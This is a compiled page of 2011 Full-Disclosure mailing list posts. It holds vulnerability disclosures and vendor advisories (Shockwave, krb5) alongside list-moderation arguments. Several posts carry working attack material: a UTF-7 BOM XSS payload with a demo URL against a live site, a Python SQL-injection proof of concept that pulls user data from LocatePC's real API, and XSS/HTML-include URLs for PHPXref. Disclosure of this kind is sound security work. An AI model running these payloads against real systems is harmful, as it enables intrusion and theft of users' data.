[Full-disclosure] xss attacks through utf7-BOM string injection
xss attacks through utf7-BOM string injection
the beginning of the utf-7 BOM chascter is from Gareth Heyes's paper 《XSS
Lightsabre techniques》
-start--
CSS expressions with UTF-7
• UTF-7 BOM character can force UTF-7 in a external style sheet
• Would you let me upload a style sheet?
• @charset „UTF-7‟; works
• But you don‟t need it
• +/v8 is all you need
+/v8
body {
font-family:
'+AHgAJwA7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoAGEAbA
BlAHIAdAAoADEAKQApADsAZgBvAG4AdAAtAGYAYQBtAGkAbAB5ADoAJw-';
---end-
this eg is for style sheet, and it work well on html file. like this demo:
http://www.80vul.com/test/utf7.htm. the file format is only base on the
first four bytes and the Space. so If we can control the beginning of the
file bytes of html file, Then we can be injected any html/javascript code,
it can lead to xss attacks.
json-callback + utf7-BOM string injection == lots of xss vul
online, lots of sites set the json file's Content-Type: text/html. and
callback function name at the first bytes is a ariable. so it leadto xss
vuls using utf7-BOM string injection.
the demo:
http://www.tudou.com/my/channel/item.srv?icode=enQCgQKJTDscallback=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg-%20xsadas
and u can use GOOGLE Hacking to find where are the callbacks:
site:80vul.com inurl:callback
Happy New Year!
thanks Mario Heiderich for u tell me what is +/v8 :)
thanks Gareth Heyes for u the nice paper.
--superhei from http://www.80vul.com
--ad--
About Ph4nt0m Webzine
Ph4nt0m Webzine is a free network Security Magazine,We accept articles in
English and Chinese, you are welcome contributions .
mailto:root_at_ph4nt0m.org pls.thank you!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)
Full disclosure means just that, unfortunately we have to take all the bad with the good. Sure it would work well for messages just being trolls/profanities and whatnot, but it would be up to the moderator to determine if something falls into a non desirable category. I am sure you can see at this point it becomes complicated. What if an issue compromising national security gets posted (wetdream) would the moderator remove it or keep it? I believe it's asking a lot for someone to moderate this list, it may not seem it but it's a huge ethical responsibility. especially if a vendor ends up having a say in the moderation Regards, David Klein -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Georgi Guninski Sent: Wednesday, February 09, 2011 7:30 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v) is FD moderated or not? (hint: ask n3td3v). i suggest this inconsistency be fixed in one way or another :) -- joro ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CGI:IRC XSS issue (CVE-2011-0050)
Michael Brooks (Sitewatch) discovered an XSS issue in the nonjs interface that allowed HTML injection via a crafted parameter. 0.5.10 is now available. This is actually just 0.5.9 with the following fix: - CVE-2011-0050: XSS in R param in nonjs interface David ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)
moderation on this list is moot since people just sign up with a new email address as i have done several times in the past years 2011/2/8 David Klein david.kl...@ipfocus.com.au Full disclosure means just that, unfortunately we have to take all the bad with the good. Sure it would work well for messages just being trolls/profanities and whatnot, but it would be up to the moderator to determine if something falls into a non desirable category. I am sure you can see at this point it becomes complicated. What if an issue compromising national security gets posted (wetdream) would the moderator remove it or keep it? I believe it's asking a lot for someone to moderate this list, it may not seem it but it's a huge ethical responsibility. especially if a vendor ends up having a say in the moderation Regards, David Klein -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Georgi Guninski Sent: Wednesday, February 09, 2011 7:30 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v) is FD moderated or not? (hint: ask n3td3v). i suggest this inconsistency be fixed in one way or another :) -- joro ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)
moderated as in he removes people he thinks crosses the line and it has been done for a lot longer than that so no andrew you are not special.. it did not happen due to your inane ramblings 2011/2/9 andrew.wallace andrew.wall...@rocketmail.com On Wed, Feb 9, 2011 at 12:45 PM, huj huj huj datski...@gmail.com wrote: moderation on this list is moot since people just sign up with a new email address as i have done several times in the past years The list has been moderated since January 21, 2009-- This includes any new sign ups are automatically moderated. http://lists.grok.org.uk/pipermail/full-disclosure/2009-January/067676.html Andrew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)
fair enough i stand corrected however the old practice you mentioned in the earlier post has been going on for years maybe you should have posted this link in that post :) 2011/2/9 andrew.wallace andrew.wall...@rocketmail.com On Wed, Feb 9, 2011 at 12:59 PM, huj huj huj datski...@gmail.com wrote: moderated as in he removes people he thinks crosses the line and it has been done for a lot longer than that so no andrew you are not special.. it did not happen due to your inane ramblings You're talking rubbish because it was mentioned here: http://lists.grok.org.uk/pipermail/full-disclosure/2010-March/073809.html *Every* new email address from *everyone* is moderated. Andrew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] trivial SQL injection in LIGATT Security's LocatePC software
trivial SQL injection in LIGATT Security's LocatePC software
--
I'm going to skip all the drama and get straight to it. The
software is crap.
Affected Software:
LocatePC 1.05
Consequences:
Arbitrary SELECT queries against the LocatePC and mysql database.
The LocatePC database contains enough information to stalk all
users of the software. It may be possible to instruct the software
to upload arbitrary files from each user's computer to the LocatePC
database, and then to later extract those files from the database.
Activating the software's keylogging functionality is both possible
and hilarious.
Proof of Concept:
#!/usr/bin/python
import httplib
import urllib
import xml.etree.ElementTree
h = httplib.HTTPSConnection('www.ligattsecurity.com')
p = '''Request
funcname=uName,mac_address,last_login_ip,program_login from user
where LENGTH(last_login_ip) 0;--/Request'''
h.request(POST,/locatePC/api/,p,{ContentType:application/x-
www-form-urlencoded})
r = h.getresponse()
data = urllib.unquote_plus(r.read())
for i in xml.etree.ElementTree.fromstring(data).iter():
if i.tag == Row:
print
elif i.tag == Cell and i.text != None:
print i.text
Solution:
DON'T USE LOCATEPC!!!
References:
- http://www.ligattsecurity.com/solutions/locate-pc
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)
2011/2/9 andrew.wallace andrew.wall...@rocketmail.com On Wed, Feb 9, 2011 at 1:25 PM, huj huj huj datski...@gmail.com wrote: fair enough i stand corrected however the old practice you mentioned in the earlier post has been going on for years maybe you should have posted this link in that post :) The only thing I got wrong was the date: I said January 21, it was actually January 30, 2009 the moderation first began. My apologies, Andrew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)
Well, eventually even complete idiots get tired at beating rocks together thinking they're doing some noise On Wed, Feb 9, 2011 at 2:58 PM, huj huj huj datski...@gmail.com wrote: 2011/2/9 andrew.wallace andrew.wall...@rocketmail.com On Wed, Feb 9, 2011 at 1:25 PM, huj huj huj datski...@gmail.com wrote: fair enough i stand corrected however the old practice you mentioned in the earlier post has been going on for years maybe you should have posted this link in that post :) The only thing I got wrong was the date: I said January 21, it was actually January 30, 2009 the moderation first began. My apologies, Andrew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)
Doubtful 2011/2/9 Christian Sciberras uuf6...@gmail.com Well, eventually even complete idiots get tired at beating rocks together thinking they're doing some noise On Wed, Feb 9, 2011 at 2:58 PM, huj huj huj datski...@gmail.com wrote: 2011/2/9 andrew.wallace andrew.wall...@rocketmail.com On Wed, Feb 9, 2011 at 1:25 PM, huj huj huj datski...@gmail.com wrote: fair enough i stand corrected however the old practice you mentioned in the earlier post has been going on for years maybe you should have posted this link in that post :) The only thing I got wrong was the date: I said January 21, it was actually January 30, 2009 the moderation first began. My apologies, Andrew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in PHPXref
Hello list! I want to warn you about Cross-Site Scripting and Remote HTML Include vulnerabilities in PHPXref. - Affected products: - Vulnerable are PHPXref 0.7 and previous versions. In version PHPXref 0.7.1 the developer fixed these vulnerabilities. -- Details: -- XSS (RXI) (WASC-08): http://site/nav.html?javascript:alert(document.cookie) RHI (WASC-12): http://site/nav.html?http://websecurity.com.ua Timeline: 2010.12.27 - announced at my site. 2010.12.28 - informed developers. 2010.12.29 - PHPXref 0.7.1 released (http://phpxref.sourceforge.net/Changelog). 2011.02.08 - disclosed at my site. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/4795/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [HITB-Announce] HITB Magazine Issue 005 Released
We are proud to announce the immediate availability of HITB Magazine Issue 005 - The first HITB Magazine release for 2011! HITB Magazine = http://magazine.hackinthebox.org/ Direct Link === http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-005.pdf Just over a year has passed since Issue 001 and 2010 was definitely a great year for our humble magazine with over a 100,000 downloads of the 4 issues released which included 24 unique technical articles authored or co-authored by over 30 security experts from around the world! Since April 2010, readers have also had an opportunity to get familiar with prominent figures from the IT security industry thanks to the new Interviews section. As always, feedback of any kind is greatly appreciated so don't hesitate to drop us a line if you have any suggestions or comments on the issue. Stay tuned for Issue 006 which will be released in May 2011 in conjunction with our 2nd annual HITB Security Conference in Europe, HITB2011 - Amsterdam! See you there and in the meantime, enjoy the issue! - The HITB Editorial Team --- Hafez Kamal HITB Crew Hack in The Box (M) Sdn. Bhd. Suite 26.3, Level 26, Menara IMC, No. 8 Jalan Sultan Ismail, 50250 Kuala Lumpur, Malaysia Tel: +603-20394724 Fax: +603-20318359 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] is FD moderated or not? (hint: ask n3td3v)
On Wed, Feb 09, 2011 at 01:45:27PM +0100, huj huj huj wrote: moderation on this list is moot since people just sign up with a new email address as i have done several times in the past years hm, i thought having more than actor (possibly one time actor) was common practice on this list... i've done it too, only 2 ppl showed they got it the actor buried a 0day (developers got it several months later. please don't spoil the plot). ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2011:024 ] krb5
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:024 http://www.mandriva.com/security/ ___ Package : krb5 Date: January 9, 2011 Affected: 2009.0, 2010.0 ___ Problem Description: Multiple vulnerabilities were discovered and corrected in krb5: The MIT krb5 Key Distribution Center (KDC) daemon is vulnerable to denial of service attacks from unauthenticated remote attackers (CVE-2011-0281, CVE-2011-0282). Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149amp;products_id=490 The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0281 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0282 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-002.txt ___ Updated Packages: Mandriva Linux 2009.0: a19b45095a4c3a3325a23a98c9b62123 2009.0/i586/ftp-client-krb5-1.6.3-6.7mdv2009.0.i586.rpm 62ee1d7005c6fecc20f43d50773a8ab0 2009.0/i586/ftp-server-krb5-1.6.3-6.7mdv2009.0.i586.rpm 4a670066b022ca0d1e780e535b5dad34 2009.0/i586/krb5-1.6.3-6.7mdv2009.0.i586.rpm 27479079f1205258ebf1a95cde9c72c4 2009.0/i586/krb5-server-1.6.3-6.7mdv2009.0.i586.rpm 2b8bc1f146ae12947eb0d66571e71b6c 2009.0/i586/krb5-workstation-1.6.3-6.7mdv2009.0.i586.rpm 19fdf51bf9e901e42f59ca9e6e98f467 2009.0/i586/libkrb53-1.6.3-6.7mdv2009.0.i586.rpm d605d6a2482a43395f7099900bff82f2 2009.0/i586/libkrb53-devel-1.6.3-6.7mdv2009.0.i586.rpm 462f1389fe4095a4c4f0f6207672f2f3 2009.0/i586/telnet-client-krb5-1.6.3-6.7mdv2009.0.i586.rpm 296db9f5769dde078cb94e6e0d82095a 2009.0/i586/telnet-server-krb5-1.6.3-6.7mdv2009.0.i586.rpm 2bad38c6316246a6dc19064862355946 2009.0/SRPMS/krb5-1.6.3-6.7mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 874d1f1e9d08f0fd037dafb02f27e25a 2009.0/x86_64/ftp-client-krb5-1.6.3-6.7mdv2009.0.x86_64.rpm 809e11d3f613310a554cc410b265340a 2009.0/x86_64/ftp-server-krb5-1.6.3-6.7mdv2009.0.x86_64.rpm 1cba00d3b76c822327e475f65b8eb297 2009.0/x86_64/krb5-1.6.3-6.7mdv2009.0.x86_64.rpm 2cec696b37dca1c6838f22e6d15be960 2009.0/x86_64/krb5-server-1.6.3-6.7mdv2009.0.x86_64.rpm 2e5224b06920992dd089155524f59a84 2009.0/x86_64/krb5-workstation-1.6.3-6.7mdv2009.0.x86_64.rpm cc71b41dd2694b64ae0bd0a29f5901ae 2009.0/x86_64/lib64krb53-1.6.3-6.7mdv2009.0.x86_64.rpm 570353d6ce78ce9df326002439caec90 2009.0/x86_64/lib64krb53-devel-1.6.3-6.7mdv2009.0.x86_64.rpm fac2a3ec4699ea5468edd525581c176c 2009.0/x86_64/telnet-client-krb5-1.6.3-6.7mdv2009.0.x86_64.rpm c6101ff519432a473fe54813dee91920 2009.0/x86_64/telnet-server-krb5-1.6.3-6.7mdv2009.0.x86_64.rpm 2bad38c6316246a6dc19064862355946 2009.0/SRPMS/krb5-1.6.3-6.7mdv2009.0.src.rpm Mandriva Linux 2010.0: d5b2da171f65a6b7ac3e60e01e4d1712 2010.0/i586/ftp-client-krb5-1.6.3-10.5mdv2010.0.i586.rpm 27ae96d163768f10187a40eca4f754d2 2010.0/i586/ftp-server-krb5-1.6.3-10.5mdv2010.0.i586.rpm 498c4f101072718c07c2b7639d9d814d 2010.0/i586/krb5-1.6.3-10.5mdv2010.0.i586.rpm afdbc93b50cb27f0cede08efc9e3bc61 2010.0/i586/krb5-server-1.6.3-10.5mdv2010.0.i586.rpm 6f8b0b82cb75fdf87f25eb123a65fdcf 2010.0/i586/krb5-workstation-1.6.3-10.5mdv2010.0.i586.rpm 4273fddffc5937d7b026051eb7078a6d 2010.0/i586/libkrb53-1.6.3-10.5mdv2010.0.i586.rpm 65b924acbef7b5c7d1c5cfee4b050f89 2010.0/i586/libkrb53-devel-1.6.3-10.5mdv2010.0.i586.rpm 1c2d6cbdcffb7a34fb8ad3771d5ca037 2010.0/i586/telnet-client-krb5-1.6.3-10.5mdv2010.0.i586.rpm 3b562494dcadb73e4b92ce1f3e028c82 2010.0/i586/telnet-server-krb5-1.6.3-10.5mdv2010.0.i586.rpm ba422d1791aa61edbd91c90e544e216b 2010.0/SRPMS/krb5-1.6.3-10.5mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: 893e5137d26a641a661495f8faa9d0f5 2010.0/x86_64/ftp-client-krb5-1.6.3-10.5mdv2010.0.x86_64.rpm 086f6d9a7614e866c813da5d3d92fde7 2010.0/x86_64/ftp-server-krb5-1.6.3-10.5mdv2010.0.x86_64.rpm 3402310b1f1717057f09ee11985d4aa6 2010.0/x86_64/krb5-1.6.3-10.5mdv2010.0.x86_64.rpm e0ec3c4ef7ac973fa938152aaaf53a29 2010.0/x86_64/krb5-server-1.6.3-10.5mdv2010.0.x86_64.rpm 499e66ced99df6f4bc037abccb80e025 2010.0/x86_64/krb5-workstation-1.6.3-10.5mdv2010.0.x86_64.rpm 125db3395bdf7efeaccf1316e6ed82d3 2010.0/x86_64/lib64krb53-1.6.3-10.5mdv2010.0.x86_64.rpm e76d507737e1f700a1525465e0521ddd 2010.0/x86_64/lib64krb53-devel-1.6.3-10.5mdv2010.0.x86_64.rpm 445d12b6d5a017d1d7be171c405177e6 2010.0/x86_64/telnet-client-krb5-1.6.3-10.5mdv2010.0.x86_64.rpm 4f70e288a102af2b67738fad436715fc
[Full-disclosure] TPTI-11-01: Adobe Shockwave dirapi.dll IFWV Trusted Offset Remote Code Execution Vulnerability
TPTI-11-01: Adobe Shockwave dirapi.dll IFWV Trusted Offset Remote Code Execution Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-11-01 February 8, 2011 -- CVE ID: CVE-2010-4188 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Adobe -- Affected Products: Adobe Shockwave Player -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10817. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Adobe Shockwave Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the DIRAPI.dll module distributed with the player. While parsing a director movie (.dir or .dcr) the code trusts the specified size of the IFWV chunk and uses it within a calculation to determine another offset within the file. By setting it to 0, the code jumps to the wrong location within the file. While parsing data at the new location, the code uses a value as a loop counter. Within the loop, the code copies data to a heap buffer. By crafting a file with a large enough size, this loop can be forced to corrupt memory. A remote attacker can abuse this logic to execute arbitrary code under the context of the user running the application. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb11-01.html -- Disclosure Timeline: 2010-11-15 - Vulnerability reported to vendor 2011-02-08 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Aaron Portnoy and Logan Brown, TippingPoint DVLabs ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TPTI-11-02: Adobe Shockwave TextXtra Invalid Seek Remote Code Execution Vulnerability
TPTI-11-02: Adobe Shockwave TextXtra Invalid Seek Remote Code Execution Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-11-02 February 8, 2011 -- CVE ID: CVE-2011-0555 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Adobe -- Affected Products: Adobe Shockwave Player -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the code responsible for parsing a DEMX RIFF chunk within Director files. The logic within the TextXtra.x32 module fails to account for a specific condition and can be made to misallocate a buffer on the heap. By crafting specific values within DEMX substructures an attacker can corrupt memory leading to arbitrary code execution under the context of the user running the browser. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb11-01.html -- Disclosure Timeline: 2010-12-16 - Vulnerability reported to vendor 2011-02-08 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Logan Brown, TippingPoint DVLabs ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TPTI-11-03: Adobe Shockwave Font Xtra String Decoding Remote Code Execution Vulnerability
TPTI-11-03: Adobe Shockwave Font Xtra String Decoding Remote Code Execution Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-11-03 February 8, 2011 -- CVE ID: CVE-2011-0556 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Adobe -- Affected Products: Adobe Shockwave Player -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Adobe Shockwave Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the Font Xtra.x32 asset module responsible for parsing font structures within Director movie files (.dir). When parsing data within the PFR1 chunk, the process implicitly sign-extends a 16-bit size value and seeks pointers accordingly. It then operates upon the data it has reached which can be abused by an attacker to corrupt memory and subsequently execute arbitrary code under the context of the user running the browser. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb11-01.html -- Disclosure Timeline: 2010-12-16 - Vulnerability reported to vendor 2011-02-08 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Logan Brown, TippingPoint DVLabs ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TPTI-11-04: Adobe Shockwave GIF Logical Screen Descriptor Parsing Remote Code Execution Vulnerability
TPTI-11-04: Adobe Shockwave GIF Logical Screen Descriptor Parsing Remote Code Execution Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-11-04 February 8, 2011 -- CVE ID: CVE-2010-4189 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Adobe -- Affected Products: Adobe Shockwave Player -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Adobe Shockwave Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the IML32 module distributed with the player. While parsing GIF files within a director movie (.dir or .dcr) the code trusts the specified size of the global color table and uses it to determine an offset to image data. The process subsequently attempts to write two NULL bytes to the calculated address. A remote attacker can abuse this logic to corrupt memory at a controlled location and subsequently execute arbitrary code under the context of the user running the application. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb11-01.html -- Disclosure Timeline: 2010-11-15 - Vulnerability reported to vendor 2011-02-08 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Aaron Portnoy, TippingPoint DVLabs ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TPTI-11-05: Adobe Shockwave PFR1 Font Chunk Parsing Remote Code Execution Vulnerability
TPTI-11-05: Adobe Shockwave PFR1 Font Chunk Parsing Remote Code Execution Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-11-05 February 8, 2011 -- CVE ID: CVE-2011-0569 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Adobe -- Affected Products: Adobe Shockwave Player -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10825. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Adobe Shockwave Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the code responsible for parsing font structures within Director files. While processing data within the PFR1 chunk, the process trusts a size value and compares a sign-extended counter against it within a copy loop. By providing a sufficiently large value, this flaw can be abused by a remote attacker to execute arbitrary code under the context of the user running the browser. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb11-01.html -- Disclosure Timeline: 2011-01-24 - Vulnerability reported to vendor 2011-02-08 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Logan Brown and Aaron Portnoy, TippingPoint DVLabs * Luigi Auriemma ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2011:025 ] krb5
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2011:025 http://www.mandriva.com/security/ ___ Package : krb5 Date: January 9, 2011 Affected: 2010.1, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities were discovered and corrected in krb5: The MIT krb5 KDC database propagation daemon (kpropd) is vulnerable to a denial-of-service attack triggered by invalid network input. If a kpropd worker process receives invalid input that causes it to exit with an abnormal status, it can cause the termination of the listening process that spawned it, preventing the slave KDC it was running on From receiving database updates from the master KDC (CVE-2010-4022). The MIT krb5 Key Distribution Center (KDC) daemon is vulnerable to denial of service attacks from unauthenticated remote attackers (CVE-2011-0281, CVE-2011-0282). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4022 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0281 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0282 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-001.txt http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-002.txt ___ Updated Packages: Mandriva Linux 2010.1: 4257cc617b96c71c95256eab33442bc2 2010.1/i586/krb5-1.8.1-5.3mdv2010.2.i586.rpm 025655b729ac32712c54f801849e93c2 2010.1/i586/krb5-pkinit-openssl-1.8.1-5.3mdv2010.2.i586.rpm b690a8719f533a29ae7f92397b8c89fd 2010.1/i586/krb5-server-1.8.1-5.3mdv2010.2.i586.rpm 60cf99234bd79802947425404eb4493b 2010.1/i586/krb5-server-ldap-1.8.1-5.3mdv2010.2.i586.rpm adab88a879966d2a0daf4d17bfd288fc 2010.1/i586/krb5-workstation-1.8.1-5.3mdv2010.2.i586.rpm a481d252c831d40de9d7ccf00403105e 2010.1/i586/libkrb53-1.8.1-5.3mdv2010.2.i586.rpm b031d51a205194decf50c5187e0d0e50 2010.1/i586/libkrb53-devel-1.8.1-5.3mdv2010.2.i586.rpm a2e5bcabf3633d6f32c214b03f1252eb 2010.1/SRPMS/krb5-1.8.1-5.3mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: 586ecee11e45dc3266f172a58169a945 2010.1/x86_64/krb5-1.8.1-5.3mdv2010.2.x86_64.rpm d9418b6bfe4aff10c9de32d08a4cd4fc 2010.1/x86_64/krb5-pkinit-openssl-1.8.1-5.3mdv2010.2.x86_64.rpm 31a9d6629d25eea120fbd11853e25e0c 2010.1/x86_64/krb5-server-1.8.1-5.3mdv2010.2.x86_64.rpm 7fd34307e298b4f47970d3c77851ecdb 2010.1/x86_64/krb5-server-ldap-1.8.1-5.3mdv2010.2.x86_64.rpm 42552d1978fc6e66c3d7138da59b103d 2010.1/x86_64/krb5-workstation-1.8.1-5.3mdv2010.2.x86_64.rpm 362506d043aa087dcb743a0a3aa4f687 2010.1/x86_64/lib64krb53-1.8.1-5.3mdv2010.2.x86_64.rpm f5f376d22fe98cdb7ec542c9a917873a 2010.1/x86_64/lib64krb53-devel-1.8.1-5.3mdv2010.2.x86_64.rpm a2e5bcabf3633d6f32c214b03f1252eb 2010.1/SRPMS/krb5-1.8.1-5.3mdv2010.2.src.rpm Mandriva Enterprise Server 5: 9195a6f446623619ecca9433108b8ce2 mes5/i586/krb5-1.8.1-0.4mdvmes5.1.i586.rpm d0de4724705b78ebaccdc0f1e332bdc0 mes5/i586/krb5-pkinit-openssl-1.8.1-0.4mdvmes5.1.i586.rpm c573a00957ba2f5c9f813bf66d2639b6 mes5/i586/krb5-server-1.8.1-0.4mdvmes5.1.i586.rpm d8e5bb51f39680e0e034864f3c7ab389 mes5/i586/krb5-server-ldap-1.8.1-0.4mdvmes5.1.i586.rpm a6d37c289467daf9ec6be7386fd08804 mes5/i586/krb5-workstation-1.8.1-0.4mdvmes5.1.i586.rpm 5fe3268dc275b2255503b45b9dad1710 mes5/i586/libkrb53-1.8.1-0.4mdvmes5.1.i586.rpm 9fa6291f9bcf123e151743681c197e20 mes5/i586/libkrb53-devel-1.8.1-0.4mdvmes5.1.i586.rpm f3636ce525a3743da670335fad739b4d mes5/SRPMS/krb5-1.8.1-0.4mdvmes5.1.src.rpm Mandriva Enterprise Server 5/X86_64: e8f92b4b8d9e80929bc40df9398e7407 mes5/x86_64/krb5-1.8.1-0.4mdvmes5.1.x86_64.rpm c7c9cc07256630ad3580ac8af6fd1731 